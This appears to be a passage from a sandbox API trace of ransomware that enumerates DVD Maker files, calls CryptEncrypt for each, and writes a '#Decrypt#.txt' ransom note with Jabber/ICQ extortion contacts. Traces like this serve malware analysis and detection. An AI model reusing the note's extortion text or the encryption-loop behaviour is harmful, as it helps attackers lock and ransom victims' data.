lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f345b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f345b0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.419] lstrcmpiW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.419] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 86 [0251.419] StrStrIW (lpFirst="BabyBoyNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.419] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.419] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.419] lstrlenW (lpString=".testttjffg") returned 11 [0251.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0251.420] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f5a70d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f5a70d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2472c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.420] lstrcmpiW (lpString1="BabyBoyScenesBackground.wmv", lpString2="Windows") returned -1 [0251.420] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 83 [0251.420] StrStrIW (lpFirst="BabyBoyScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.420] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.420] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.420] lstrlenW (lpString=".testttjffg") returned 11 [0251.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.421] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f8086a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f8086a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1e96c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.421] lstrcmpiW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.421] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned 87 [0251.421] StrStrIW (lpFirst="BabyBoyScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.421] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.421] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.421] lstrlenW (lpString=".testttjffg") returned 11 [0251.421] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.421] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.421] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.422] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fa69c7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fa69c7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f0141b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="LightBlueRectangle.PNG", cAlternateFileName="")) returned 1 [0251.422] lstrcmpiW (lpString1="LightBlueRectangle.PNG", lpString2="Windows") returned -1 [0251.422] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned 78 [0251.422] StrStrIW (lpFirst="LightBlueRectangle.PNG", lpSrch=".horseleader") returned 0x0 [0251.422] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="#Decrypt#.txt") returned 1 [0251.422] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="_uninstalling_.png") returned 1 [0251.422] lstrlenW (lpString=".testttjffg") returned 11 [0251.422] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG", lpSrch=".testttjffg") returned 0x0 [0251.422] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.422] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" 
(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.423] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb6a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="MainMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0251.423] lstrcmpiW (lpString1="MainMenuButtonIcon.png", lpString2="Windows") returned -1 [0251.423] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned 78 [0251.423] StrStrIW (lpFirst="MainMenuButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.423] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.423] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.423] lstrlenW (lpString=".testttjffg") returned 11 [0251.423] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.423] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.423] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.423] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7103ef3b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7103ef3b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf63, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="navSubpicture.png", cAlternateFileName="")) returned 1 [0251.423] lstrcmpiW (lpString1="navSubpicture.png", lpString2="Windows") returned -1 [0251.423] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned 73 [0251.424] StrStrIW (lpFirst="navSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.424] lstrcmpW (lpString1="navSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.424] lstrcmpW (lpString1="navSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.424] lstrlenW (lpString=".testttjffg") returned 11 [0251.424] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.424] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.424] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.424] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.425] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fccb24, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70fccb24, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_leftarrow.png", cAlternateFileName="")) returned 1 [0251.425] lstrcmpiW (lpString1="nav_leftarrow.png", lpString2="Windows") returned -1 [0251.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 73 [0251.425] StrStrIW (lpFirst="nav_leftarrow.png", lpSrch=".horseleader") returned 0x0 [0251.425] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.425] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="_uninstalling_.png") returned 1 [0251.425] lstrlenW (lpString=".testttjffg") returned 11 [0251.425] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png", lpSrch=".testttjffg") returned 0x0 [0251.425] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.426] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ff2c81, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ff2c81, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f27579, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11a3, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_rightarrow.png", cAlternateFileName="")) returned 1 [0251.426] lstrcmpiW (lpString1="nav_rightarrow.png", lpString2="Windows") returned -1 [0251.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned 74 [0251.426] StrStrIW (lpFirst="nav_rightarrow.png", lpSrch=".horseleader") returned 0x0 [0251.426] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.426] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="_uninstalling_.png") returned 1 [0251.426] lstrlenW (lpString=".testttjffg") returned 11 [0251.426] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png", lpSrch=".testttjffg") returned 0x0 [0251.427] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.427] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.427] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 1 [0251.427] lstrcmpiW (lpString1="nav_uparrow.png", lpString2="Windows") returned -1 [0251.427] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned 71 [0251.427] StrStrIW (lpFirst="nav_uparrow.png", lpSrch=".horseleader") returned 0x0 [0251.427] lstrcmpW (lpString1="nav_uparrow.png", lpString2="#Decrypt#.txt") returned 1 [0251.427] lstrcmpW (lpString1="nav_uparrow.png", lpString2="_uninstalling_.png") returned 1 [0251.428] lstrlenW (lpString=".testttjffg") returned 11 [0251.428] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png", lpSrch=".testttjffg") returned 0x0 [0251.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.428] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71018dde, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71018dde, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="nav_uparrow.png", cAlternateFileName="")) returned 0 [0251.428] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\#Decrypt#.txt") returned 69 [0251.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.431] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.431] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.432] lstrlenA (lpString="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") returned 1368 [0251.433] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.433] CloseHandle (hObject=0x158) returned 1 [0251.433] GetProcessHeap () returned 0x780000 [0251.433] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.433] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BabyGirl", cAlternateFileName="")) returned 1 [0251.433] lstrcmpiW (lpString1="BabyGirl", lpString2="Windows") returned -1 [0251.433] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 56 [0251.433] lstrcmpW (lpString1="BabyGirl", lpString2=".") returned 1 [0251.433] lstrcmpW (lpString1="BabyGirl", lpString2="..") returned 1 [0251.433] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.433] GetProcessHeap () returned 0x780000 [0251.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0251.434] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*") returned 58 [0251.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.436] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\.") returned 58 [0251.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.436] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab67eab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa15a10e8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.436] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\..") returned 59 [0251.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.436] 
